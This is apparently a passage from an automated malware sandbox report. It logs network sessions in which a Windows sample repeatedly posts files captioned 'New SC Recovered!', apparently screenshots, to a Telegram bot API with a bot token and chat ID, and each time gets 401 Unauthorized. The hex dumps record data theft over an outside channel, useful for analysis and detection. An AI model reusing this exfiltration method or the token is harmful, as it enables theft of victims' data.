2d 14
                                                Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
                                                2024-07-25 22:01:40 UTC7412OUTData Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28
                                                Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
                                                2024-07-25 22:01:40 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 38 38 33 66 31 35 39 61 65 33 64 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcd883f159ae3d--
                                                2024-07-25 22:01:40 UTC25INHTTP/1.1 100 Continue
                                                2024-07-25 22:01:40 UTC405INHTTP/1.1 401 Unauthorized
                                                Server: nginx/1.18.0
                                                Date: Thu, 25 Jul 2024 22:01:40 GMT
                                                Content-Type: application/json
                                                Content-Length: 58
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                11192.168.2.649738149.154.167.2204435020C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 22:01:42 UTC262OUTPOST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcdb04645b2b88
                                                Host: api.telegram.org
                                                Content-Length: 57551
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-07-25 22:01:42 UTC25INHTTP/1.1 100 Continue
                                                2024-07-25 22:01:42 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 62 30 34 36 34 35 62 32 62 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 62 30 34 36 34 35 62 32 62 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 39 2f 32 32 2f 32 30 32 34 20 31 32 3a 34 35 3a 30 30 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcdb04645b2b88Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcdb04645b2b88Content-Disposition: form-data; name="caption"New SC Recovered!Time: 09/22/2024 12:45:00User
                                                2024-07-25 22:01:42 UTC16355OUTData Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c
                                                Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
                                                2024-07-25 22:01:42 UTC16355OUTData Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b
                                                Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
                                                2024-07-25 22:01:42 UTC16355OUTData Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14
                                                Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
                                                2024-07-25 22:01:42 UTC7412OUTData Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28
                                                Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
                                                2024-07-25 22:01:42 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 62 30 34 36 34 35 62 32 62 38 38 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcdb04645b2b88--
                                                2024-07-25 22:01:42 UTC405INHTTP/1.1 401 Unauthorized
                                                Server: nginx/1.18.0
                                                Date: Thu, 25 Jul 2024 22:01:42 GMT
                                                Content-Type: application/json
                                                Content-Length: 58
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                12192.168.2.649740149.154.167.2204435020C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 22:01:48 UTC262OUTPOST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcdf0de441e7a8
                                                Host: api.telegram.org
                                                Content-Length: 57551
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-07-25 22:01:48 UTC25INHTTP/1.1 100 Continue
                                                2024-07-25 22:01:48 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 30 64 65 34 34 31 65 37 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 30 64 65 34 34 31 65 37 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 39 2f 32 37 2f 32 30 32 34 20 31 35 3a 35 33 3a 31 30 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcdf0de441e7a8Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcdf0de441e7a8Content-Disposition: form-data; name="caption"New SC Recovered!Time: 09/27/2024 15:53:10User
                                                2024-07-25 22:01:48 UTC16355OUTData Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c
                                                Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
                                                2024-07-25 22:01:48 UTC16355OUTData Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b
                                                Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
                                                2024-07-25 22:01:48 UTC16355OUTData Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14
                                                Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
                                                2024-07-25 22:01:48 UTC7412OUTData Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28
                                                Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
                                                2024-07-25 22:01:48 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 30 64 65 34 34 31 65 37 61 38 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcdf0de441e7a8--
                                                2024-07-25 22:01:48 UTC405INHTTP/1.1 401 Unauthorized
                                                Server: nginx/1.18.0
                                                Date: Thu, 25 Jul 2024 22:01:48 GMT
                                                Content-Type: application/json
                                                Content-Length: 58
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                13192.168.2.649741149.154.167.2204435020C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 22:02:00 UTC262OUTPOST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dce4e1dc8f71b2
                                                Host: api.telegram.org
                                                Content-Length: 57551
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-07-25 22:02:00 UTC25INHTTP/1.1 100 Continue
                                                2024-07-25 22:02:00 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 34 65 31 64 63 38 66 37 31 62 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 34 65 31 64 63 38 66 37 31 62 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 30 2f 30 35 2f 32 30 32 34 20 30 31 3a 35 33 3a 30 32 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dce4e1dc8f71b2Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dce4e1dc8f71b2Content-Disposition: form-data; name="caption"New SC Recovered!Time: 10/05/2024 01:53:02User
                                                2024-07-25 22:02:00 UTC16355OUTData Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c
                                                Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
                                                2024-07-25 22:02:00 UTC16355OUTData Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b
                                                Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
                                                2024-07-25 22:02:00 UTC16355OUTData Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14
                                                Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
                                                2024-07-25 22:02:00 UTC7412OUTData Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28
                                                Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
                                                2024-07-25 22:02:00 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 34 65 31 64 63 38 66 37 31 62 32 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dce4e1dc8f71b2--
                                                2024-07-25 22:02:00 UTC405INHTTP/1.1 401 Unauthorized
                                                Server: nginx/1.18.0
                                                Date: Thu, 25 Jul 2024 22:02:00 GMT
                                                Content-Type: application/json
                                                Content-Length: 58
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                14192.168.2.649742149.154.167.2204435020C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
                                                TimestampBytes transferredDirectionData
